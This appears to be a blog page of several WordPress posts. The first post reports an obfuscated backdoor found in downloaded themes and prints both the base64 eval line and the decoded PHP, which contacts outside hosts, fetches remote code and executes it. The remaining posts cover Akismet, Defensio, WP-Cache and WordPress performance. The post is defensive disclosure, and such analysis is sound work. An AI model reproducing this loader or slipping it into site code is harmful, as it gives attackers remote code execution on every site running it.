WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper, and saw this in his theme’s header.php (I added the newlines for displaying purposes)

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with the newlines)

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
 $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
 $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
 @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  $R3E33E017CD76B9B7E6C7364FB91E2E90 =
 @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } 

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php


Which doesn’t turn out to be as bad, only few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted, they don’t need any more pagerank. Who knew people were so shady. I urge those looking to get WordPress Themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.

Comments (3)

Beta Testing Defensio

Akismet isn’t perfect. I’ve been using it to block my spam since it became available. One of its major problems is that it often lets through what Defensio calls URL-less spam, and sometimes less through spam WITH urls, which I don’t quite understand.

Anyway, so right after this post, I’ll be disabling Akismet and turning on Defensio Beta. I’ll be monitoring spam incoming, ham incoming, speed of page loads, etc. If you notice anything funky, let me know 🙂

Comments (0)

Testing WP-Cache

This is only a test 🙂

If there are any problems, please let me know!

Comments (7)

Akismet Annoyances

I use Akismet on my WordPress site to catch spam. At first I was very impressed with it. When I first installed it (a few weeks after it was announced), it worked very well; it would catch all spam and let all ham through. I’ve made sure to have the latest version of the Akismet plugin for WordPress installed. Since 99% of the spam determining is done on the akismet server side, there haven’t been any client side updates in some time. My Akismet setup has caught 25,521 spam comments so far.

But recently, it has been misbehaving on my site and the sites of some of my friends that use it. I get 5-10 spam comments a week that Akismet thinks is ham, and every once in awhile I’ll get a ham comment that Akismet thinks is spam. Then it will place SOME items in moderation which are VERY obviously spam (100+ links).

It’s annoying, and I wish Akismet would get it together. For now, I’ll be patient and keep flagging comments accordingly. After all, there’s still nothing better…

Edit: I found an announcement for Defensio, which could be an Akismet replacer. I requested information and perhaps inclusion in the beta. This sounds promising.

Comments (1)

WordPress performs poorly.

When I first came into web development and blogging, I thought WordPress was great. It handled many of the things that I needed handling, and it did it intuitively and fairly quickly. Since then I’ve had lots of experience with lack of performance, and optimizing web code for performance. Let’s face it, we don’t all have dedicated quad cores for webhosting, nor do we necessarily have separate boxes for DB server and webserver.

WordPress is not optimized for large amounts of traffic. There is seemingly no caching (within WordPress) whatsoever. On a normal pageload it makes no fewer than 10 trips back to the database. That’s why if you see a non protected WordPress site “dugg”, or “slashdotted”, it will be down after only a moderate number of concurrent hits.

WP-Cache is a plugin for WordPress that caches pages and posts, not requiring WordPress to hit the database upon pageloads. I couldn’t get it to work with my WordPress setup after about a half hour of tinkering, but in theory that would make WordPress a robust, non-performance-hog piece of software. But the point is that there should be no excuses to creating poorly performing code. There shouldn’t have to be a user-submitted-tweak that “fixes” software to not be slow.

Maybe we’ll see it when the WordPress team finally considers it high priority, perhaps by WordPress version 5.9.2.

Comments (6)